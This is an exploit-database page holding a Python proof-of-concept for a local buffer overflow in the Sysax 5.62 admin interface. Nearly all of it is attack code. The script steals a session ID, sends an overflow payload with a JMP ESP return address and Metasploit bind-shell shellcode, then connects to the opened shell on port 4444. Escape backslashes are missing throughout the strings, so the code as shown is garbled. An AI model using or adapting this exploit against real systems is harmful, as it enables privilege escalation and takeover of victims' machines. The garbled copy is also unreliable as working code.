[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Sysax <= 5.62 Admin Interface Local Buffer Overflow
# Published : 2012-06-20
# Author :
# Previous Title : Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow
# Next Title : Windows Escalate UAC Execute RunAs
#!/usr/bin/python
##########################################################################################################
#Title: Sysax <= 5.62 Admin Interface Local Buffer Overflow
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit
#Date Discovered: June 15, 2012
#Vendor Contacted: June 19, 2012
#Details: http://www.pwnag3.com/2012/06/sysax-admin-interface-local-priv.html
##########################################################################################################
import socket,sys,time,re,base64,subprocess
def main():
global login
print "n"
print "****************************************************************************"
print " Sysax <= 5.62 Admin Interface Local Buffer Overflow "
print " by @cd1zz www.pwnag3.com "
print "****************************************************************************"
#initial GET
login = "GET /scgi? HTTP/1.1rn"
login +="Host: localhost:88rn"
login += "Referer: http://localhost:88rnrn"
try:
r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
r.connect((target, port))
print "[+] Accessing admin interface"
r.send(login)
except Exception, e:
print "[-] There was a problem"
print e
#loop the recv sock so we get the full page
page = ''
fullpage = ''
while "</html>" not in fullpage:
page = r.recv(4096)
fullpage += page
time.sleep(1)
#regex the sid from the page
global sid
sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
if sid is None:
print "[-] There was a problem finding your SID"
sys.exit(1)
time.sleep(1)
r.close()
def exploit():
#msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b "x00x0ax0d"
shell = (
"xdbxd5xd9x74x24xf4xb8xc3x8fxb3x3ex5bx33xc9"
"xb1x56x31x43x18x03x43x18x83xebx3fx6dx46xc2"
"x57xfbxa9x3bxa7x9cx20xdex96x8ex57xaax8ax1e"
"x13xfex26xd4x71xebxbdx98x5dx1cx76x16xb8x13"
"x87x96x04xffx4bxb8xf8x02x9fx1axc0xccxd2x5b"
"x05x30x1cx09xdex3ex8exbex6bx02x12xbexbbx08"
"x2axb8xbexcfxdex72xc0x1fx4ex08x8ax87xe5x56"
"x2bxb9x2ax85x17xf0x47x7exe3x03x81x4ex0cx32"
"xedx1dx33xfaxe0x5cx73x3dx1ax2bx8fx3dxa7x2c"
"x54x3fx73xb8x49xe7xf0x1axaax19xd5xfdx39x15"
"x92x8ax66x3ax25x5ex1dx46xaex61xf2xcexf4x45"
"xd6x8bxafxe4x4fx76x1ex18x8fxdexffxbcxdbxcd"
"x14xc6x81x99xd9xf5x39x5ax75x8dx4ax68xdax25"
"xc5xc0x93xe3x12x26x8ex54x8cxd9x30xa5x84x1d"
"x64xf5xbexb4x04x9ex3ex38xd1x31x6fx96x89xf1"
"xdfx56x79x9ax35x59xa6xbax35xb3xd1xfcxfbxe7"
"xb2x6axfex17x25x37x77xf1x2fxd7xd1xa9xc7x15"
"x06x62x70x65x6cxdex29xf1x38x08xedxfexb8x1e"
"x5ex52x10xc9x14xb8xa5xe8x2bx95x8dx63x14x7e"
"x47x1axd7x1ex58x37x8fx83xcbxdcx4fxcdxf7x4a"
"x18x9axc6x82xccx36x70x3dxf2xcaxe4x06xb6x10"
"xd5x89x37xd4x61xaex27x20x69xeax13xfcx3cxa4"
"xcdxbax96x06xa7x14x44xc1x2fxe0xa6xd2x29xed"
"xe2xa4xd5x5cx5bxf1xeax51x0bxf5x93x8fxabxfa"
"x4ex14xdbxb0xd2x3dx74x1dx87x7fx19x9ex72x43"
"x24x1dx76x3cxd3x3dxf3x39x9fxf9xe8x33xb0x6f"
"x0exe7xb1xa5")
nops = "x90" * 20
#7CA7A787 FFE4 JMP ESP shell32.dll v6.00.2900.6072
jmp_esp = "x87xA7xA7x7C"
payload = base64.b64encode(("A" * 392 + jmp_esp + nops + shell + nops))
#setup exploit
exploit = "POST /scgi?"+str(sid.group(0))+"&pid=scriptpathbrowse2.htm HTTP/1.1rn"
exploit += "Host: localhost:88rn"
exploit += "Content-Type: application/x-www-form-urlencodedrn"
exploit += "Content-Length: "+ str(len(payload)+3)+"rnrn"
exploit += "e2="+payload+"rnrn"
try:
r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
r.connect((target, port))
print "[+] Sending pwnag3"
r.send(exploit)
except Exception, e:
print "[-] There was a problem"
print e
time.sleep(2)
print "[+] Here is your shell..."
subprocess.Popen("telnet localhost 4444", shell=True).wait()
sys.exit(1)
if __name__ == '__main__':
if len(sys.argv) != 1:
print "[-] Usage: %s"
sys.exit(1)
#by default it binds to 127.0.0.1 on 88
target = "127.0.0.1"
port = 88
main()
exploit()